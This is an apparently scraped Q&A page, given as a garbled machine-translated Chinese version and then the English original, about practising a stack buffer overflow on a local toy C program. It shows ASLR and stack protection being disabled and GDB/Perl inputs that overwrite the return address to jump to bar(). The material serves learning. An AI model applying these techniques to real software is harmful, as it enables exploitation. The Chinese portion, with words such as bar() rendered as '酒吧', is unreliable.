问题描述
我目前在学习如何做缓冲区溢出感兴趣。我已经做了相当多的集会,并理解堆栈是如何工作的,以及如何实现C中的缓冲区溢出不过,我跨越了相当多的试图让GCC 4.9.1麻烦运行,让我溢出适当缓冲。我运行Debian杰西。
是,我试图按照教程,在第2.2。我复制/粘贴的C程序,他提供了,而我使用的是相同的Perl脚本,他,所以一切都是完全相同的他的案件(除系统,当然)。
这是我得到一致的结果:
〜/项目/缓冲区溢出$ LS
run.pl test.c的
〜/项目/缓冲区溢出$ sudo的苏
根@#洗回声0>的/ proc / SYS /内核/ randomize_va_space
根@#洗出
出口
〜/项目/缓冲区溢出$ GCC -m32 -fno-堆栈保护-zexecstack test.c的
〜/项目/缓冲区溢出$ ./run.pl
富= 0x804845b地址
巴= 0x80484a4地址
我的堆栈是这样的:
(零)
0xffffd4a8
0xf7e58b2f
0xf7fb3ac0
0x8048657
0xffffd494 ABCDEFGHIJKLMNOPP?@
现在堆栈的样子:
0xffffd718
0xffffd4a8
0xf7e58b2f
0xf7fb3ac0
0x42418657
0x46454443
这是Perl脚本不是特别有用在这里,不同的系统将使用不同的地址,所以让我们做到这一点,而无需脚本...
首先,找出覆盖返回地址所需的字节的确切数量。我们可以用GDB和Perl做到这一点:
(GDB)运行`的perl -e打印A×26;`
富= 0x804845b地址
巴= 0x80484a5地址
我的堆栈是这样的:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
0xffffdaa8AAAAAAAAAAAAAAAAAAAAAAAAAA
现在堆栈的样子:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141
计划接收信号SIGSEGV,分割过错。
0x41414141在?? ()
正如你所看到的,26个字节将覆盖EIP,所以用我们的酒吧()函数的地址代替最后四个A字符(别忘了把它放在小尾数格式),我们应该有成功
(GDB)运行`的perl -e打印A×22;``的perl -e'打印\\ xa5 \\ X84 \\ X04 \\ X8';'
富= 0x804845b地址
巴= 0x80484a5地址
我的堆栈是这样的:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
0xffffdaa8AAAAAAAAAAAAAAAAAAAAAA
现在堆栈的样子:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141Augh!我被黑客攻击了!计划接收信号SIGSEGV,分割过错。
0xffffdc06在?? ()
正如你所看到的,我们成功地返回到函数bar()。
I'm currently interested in learning how to do buffer overflows. I've done quite a bit of assembly, and understand how the stack works and how to implement a buffer overflow in C. However, I'm running across quite a bit of trouble trying to get GCC 4.9.1 to allow me to overflow a buffer properly. I'm running Debian Jessie.
Here is the tutorial that I'm attempting to follow, in section 2.2. I've copy/pasted the C program he provides, and I'm using the same Perl script that he is, so everything is the exact same as his case (except the system, of course).
These are the results that I'm getting consistently:
~/projects/buffer-overflow$ ls
run.pl test.c
~/projects/buffer-overflow$ sudo su
root@wash# echo "0" > /proc/sys/kernel/randomize_va_space
root@wash# exit
exit
~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c
~/projects/buffer-overflow$ ./run.pl
Address of foo = 0x804845b
Address of bar = 0x80484a4
My stack looks like:
(nil)
0xffffd4a8
0xf7e58b2f
0xf7fb3ac0
0x8048657
0xffffd494
ABCDEFGHIJKLMNOPP@
Now the stack looks like:
0xffffd718
0xffffd4a8
0xf7e58b2f
0xf7fb3ac0
0x42418657
0x46454443
That Perl script isn't particularly useful here, different systems will use different addresses, so let's do it without the script...
First of all, find out the exact number of bytes needed to overwrite the return address. We can do this with GDB and Perl:
(gdb) run `perl -e 'print "A" x 26';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
0xffffdaa8
AAAAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
As you can see, 26 bytes will overwrite the EIP, so by replacing the last four "A" characters with our bar() function address (don't forget to put it in little endian format), we should have success:
(gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
0xffffdaa8
AAAAAAAAAAAAAAAAAAAAAA��
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141
Augh! I've been hacked!
Program received signal SIGSEGV, Segmentation fault.
0xffffdc06 in ?? ()
As you can see, we successfully returned to function bar().
这篇关于如何在现代化的系统上测试出缓冲区溢出?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持!